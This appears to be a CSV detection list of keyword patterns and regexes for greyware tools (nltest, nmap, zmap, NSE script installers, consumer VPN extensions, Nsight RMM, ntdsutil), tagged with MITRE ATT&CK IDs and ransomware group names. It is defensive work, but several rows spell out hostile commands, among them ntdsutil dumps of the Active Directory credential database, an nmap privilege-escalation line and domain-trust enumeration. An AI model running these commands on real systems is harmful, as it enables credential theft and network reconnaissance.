"*nltest /sc_reset /force*",".{0,1000}nltest\s\/sc_reset\s\/force.{0,1000}","greyware_tool_keyword","nltest","Force a re-authentication on the secure channel","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest /server:* /domain_trusts*",".{0,1000}nltest\s\/server\:.{0,1000}\s\/domain_trusts.{0,1000}","greyware_tool_keyword","nltest","List information about all trusted domains from a specific server","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest /server:* /trusted_domains /v*",".{0,1000}nltest\s\/server\:.{0,1000}\s\/trusted_domains\s\/v.{0,1000}","greyware_tool_keyword","nltest","Check all trusted domains of a specific server (verbose mode)","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*nltest -dsgetdc*",".{0,1000}nltest\s\-dsgetdc.{0,1000}","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*./nmap*",".{0,1000}\.\/nmap.{0,1000}","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap","1","1","N/A","greyware tool - risks of False positive !","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*./test/nmap*/*.nse*",".{0,1000}\.\/test\/nmap.{0,1000}\/.{0,1000}\.nse.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*/Nmap/folder/check15*",".{0,1000}\/Nmap\/folder\/check15.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*/Nmap/folder/check16*",".{0,1000}\/Nmap\/folder\/check16.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*/Nmap/folder/check17*",".{0,1000}\/Nmap\/folder\/check17.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*/nmaplowercheck15*",".{0,1000}\/nmaplowercheck15.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://nmap.org/book/nse-usage.html","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","N/A","N/A","N/A","N/A"
"*/nmaplowercheck16*",".{0,1000}\/nmaplowercheck16.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*/nmaplowercheck17*",".{0,1000}\/nmaplowercheck17.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*/nmap-nse-scripts*",".{0,1000}\/nmap\-nse\-scripts.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*/nmap-scada*",".{0,1000}\/nmap\-scada.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*/NmapUpperCheck15*",".{0,1000}\/NmapUpperCheck15.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*/NmapUpperCheck16*",".{0,1000}\/NmapUpperCheck16.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*/NmapUpperCheck17*",".{0,1000}\/NmapUpperCheck17.{0,1000}","greyware_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap/blob/635675b1430a89e950f71112d3bfc74feee4b19a/nselib/http.lua#L2600","1","1","N/A","will appear on your server access logs if you are scanned by nmap","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*/nmap-vulners*",".{0,1000}\/nmap\-vulners.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*/nse_install/*",".{0,1000}\/nse_install\/.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*/nse-install.git*",".{0,1000}\/nse\-install\.git.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*/s4n7h0/NSE*",".{0,1000}\/s4n7h0\/NSE.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*\nmap.exe*/24*",".{0,1000}\\nmap\.exe.{0,1000}\/24.{0,1000}","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","N/A","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*b4ldr/nse-scripts*",".{0,1000}b4ldr\/nse\-scripts.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*external-nse-script-library*",".{0,1000}external\-nse\-script\-library.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*ifconfig -a | grep * | xargs nmap -*",".{0,1000}ifconfig\s\-a\s\|\sgrep\s.{0,1000}\s\|\sxargs\snmap\s\-.{0,1000}","greyware_tool_keyword","nmap","Nmap Scan Every Interface that is Assigned an IP address","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","8","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*nmap -*",".{0,1000}nmap\s\-.{0,1000}","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap","1","0","N/A","greyware tool - risks of False positive !","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*nmap * --script=*.nse*",".{0,1000}nmap\s.{0,1000}\s\-\-script\=.{0,1000}\.nse.{0,1000}","greyware_tool_keyword","nmap","check exploit for CVEs with nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://nmap.org/","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*nmap-*-setup.exe*",".{0,1000}nmap\-.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","N/A","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*nmap-elasticsearch-nse*",".{0,1000}nmap\-elasticsearch\-nse.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*nse_install.py*",".{0,1000}nse_install\.py.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*nse-insall-0.0.1*",".{0,1000}nse\-insall\-0\.0\.1.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*nse-install *",".{0,1000}nse\-install\s.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*nse-install-master*",".{0,1000}nse\-install\-master.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*OCSAF/freevulnsearch*",".{0,1000}OCSAF\/freevulnsearch.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*os.execute(*/bin/*nmap --script=$*",".{0,1000}os\.execute\(.{0,1000}\/bin\/.{0,1000}nmap\s\-\-script\=\$.{0,1000}","greyware_tool_keyword","nmap","Nmap Privilege Escalation","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Privilege Escalation","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*psc4re/NSE-scripts*",".{0,1000}psc4re\/NSE\-scripts.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*remiflavien1/nse-install*",".{0,1000}remiflavien1\/nse\-install.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*shadawck/nse-install*",".{0,1000}shadawck\/nse\-install.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*takeshixx/nmap-scripts*",".{0,1000}takeshixx\/nmap\-scripts.{0,1000}","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","N/A","7","1","6","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
"*zenmap.exe*",".{0,1000}zenmap\.exe.{0,1000}","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability Scanner","N/A","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*zmap -*",".{0,1000}zmap\s\-.{0,1000}","greyware_tool_keyword","nmap","ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection. ZMap is capable scanning the entire public IPv4 address space in under 45 minutes. With a 10gigE connection and PF_RING. ZMap can scan the IPv4 address space in under 5 minutes. ZMap operates on GNU/Linux. Mac OS. and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans. ICMP. DNS queries. UPnP. BACNET. and can send a large number of UDP probes. If you are looking to do more involved scans. e.g.. banner grab or TLS handshake. take a look at ZGrab. ZMaps sister project that performs stateful application-layer handshakes.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Vulnerability scanner","https://github.com/zmap/zmap","1","0","N/A","greyware tool - risks of False positive !","8","10","5413","907","2024-08-28T04:06:03Z","2013-01-23T01:30:09Z"
"nmap *","nmap\s.{0,1000}","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus","Discovery","https://github.com/nmap/nmap","1","0","N/A","greyware tool - risks of False positive !","8","10","9833","2360","2024-08-25T23:30:05Z","2012-03-09T14:47:43Z"
"*fjoaledfpmneenckfbpdfhkmimnjocfa*",".{0,1000}fjoaledfpmneenckfbpdfhkmimnjocfa.{0,1000}","greyware_tool_keyword","NordVPN","External VPN browser extension usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://nordvpn.com*/ovpn/*.ovpn*",".{0,1000}https\:\/\/nordvpn\.com.{0,1000}\/ovpn\/.{0,1000}\.ovpn.{0,1000}","greyware_tool_keyword","NordVPN","OVPN configuration for nordvpn accessed within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://nordvpn.com","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"* upload*.systemmonitor.eu.com*/command/agentprocessor*",".{0,1000}\supload.{0,1000}\.systemmonitor\.eu\.com.{0,1000}\/command\/agentprocessor.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Advanced Monitoring Agent\debug.log*",".{0,1000}\\Advanced\sMonitoring\sAgent\\debug\.log.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Advanced Monitoring Agent\staging*",".{0,1000}\\Advanced\sMonitoring\sAgent\\staging.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Advanced Monitoring Agent\task_start.js*",".{0,1000}\\Advanced\sMonitoring\sAgent\\task_start\.js.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Advanced Monitoring Agent\unzip.exe*",".{0,1000}\\Advanced\sMonitoring\sAgent\\unzip\.exe.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Advanced Monitoring Agent\winagent.exe*",".{0,1000}\\Advanced\sMonitoring\sAgent\\winagent\.exe.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\Advanced Monitoring Agent\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Advanced\sMonitoring\sAgent\\.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Advanced Monitoring Agent\*",".{0,1000}\\Program\sFiles\\Advanced\sMonitoring\sAgent\\.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\Advanced Monitoring Agent.lnk*",".{0,1000}\\Start\sMenu\\Programs\\Advanced\sMonitoring\sAgent\.lnk.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Advanced Monitoring Agent HTTP Retriever 1.1*",".{0,1000}Advanced\sMonitoring\sAgent\sHTTP\sRetriever\s1\.1.{0,1000}","greyware_tool_keyword","Nsight RMM","Nsight RMM usage","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","Scattered Spider*","RMM","https://www.n-able.com/products/n-sight-rmm","1","1","N/A","user-agent","10","10","N/A","N/A","N/A","N/A"
"*\system32.zip*",".{0,1000}\\system32\.zip.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0005 - TA0003 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*ntdsutil *ac i ntds* *create full*\temp*",".{0,1000}ntdsutil\s.{0,1000}ac\si\sntds.{0,1000}\s.{0,1000}create\sfull.{0,1000}\\temp.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*ntdsutil.exe *ac i ntds* *ifm* *create full *c:\ProgramData*",".{0,1000}ntdsutil\.exe\s.{0,1000}ac\si\sntds.{0,1000}\s.{0,1000}ifm.{0,1000}\s.{0,1000}create\sfull\s.{0,1000}c\:\\ProgramData.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*ntdsutil.exe *ac i ntds* *ifm* *create full *users\public*",".{0,1000}ntdsutil\.exe\s.{0,1000}ac\si\sntds.{0,1000}\s.{0,1000}ifm.{0,1000}\s.{0,1000}create\sfull\s.{0,1000}users\\public.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*ntdsutil.exe *ac i ntds*ifm*create full *temp*",".{0,1000}ntdsutil\.exe\s.{0,1000}ac\si\sntds.{0,1000}ifm.{0,1000}create\sfull\s.{0,1000}temp.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*The database engine created a new database*temp\Active Directory\ntds.dit*",".{0,1000}The\sdatabase\sengine\screated\sa\snew\sdatabase.{0,1000}temp\\Active\sDirectory\\ntds\.dit.{0,1000}","greyware_tool_keyword","ntdsutil","creating a full backup of the Active Directory database and saving it to the \temp directory","T1003.001 - T1070.004 - T1059","TA0006","N/A","Rhysida - Conti - Yanluowang - Lapsus$","Credential Access","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*ffhhkmlgedgcliajaedapkdfigdobcif*",".{0,1000}ffhhkmlgedgcliajaedapkdfigdobcif.{0,1000}","greyware_tool_keyword","Nucleus VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
